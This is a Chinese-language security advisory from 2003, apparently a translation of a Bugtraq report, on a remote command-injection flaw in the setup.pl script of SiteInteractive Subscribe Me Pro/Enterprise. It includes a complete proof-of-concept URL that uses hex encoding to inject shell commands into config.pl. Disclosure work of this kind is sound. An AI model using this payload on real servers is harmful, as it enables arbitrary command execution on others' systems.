安全研究

安全漏洞
SiteInteractive Subscribe Me setup.pl远程任意命令执行漏洞

发布日期:2003-12-18
更新日期:2003-12-29

受影响系统:
SiteInteractive Subscribe Me Pro
SiteInteractive Subscribe Me Enterprise
描述:
BUGTRAQ  ID: 9253

Subscribe me Pro/Enterprise是一款由siteinteractive开发和维护的邮件列表管理脚本。

Subscribe me Pro/Enterprise包含的setup.pl脚本允许攻击者注入SHELL命令,远程攻击者可以利用这个漏洞以WEB权限在系统上执行任意命令。

setup.pl脚本会尝试写配置变量到config.pl文件中,虽然对部分输入进行了过滤,但是可以通过使用HEX编码所有数据来绕过检查,提交恶意URI参数使脚本写入任意命令到config.pl脚本,直接调用后可以以WEB进程权限在系统上执行任意命令。

<*来源:Paul Craig (headpimp@pimp-industries.com
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=107186917715122&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Paul Craig (headpimp@pimp-industries.com)提供了如下测试方法:

http://victim.com/cgi-bin/setup.pl?RUNINSTALLATION=yes&information=~&extension=pl&config=pl&permissions=777&os=notunixornt&perlpath=/usr/bin/perl&mailprog=/bin/sh&notification="%20.`%2F%75%73%72%2F%62%69%6E%2F%69%64%20%3E%20%69%64`%20."&websiteurl=evilhacker&br_username=evilhacker&session_id=0&cgipath=.

建议:
厂商补丁:

SiteInteractive
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.siteinteractive.com/subpro/

浏览次数:2674
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障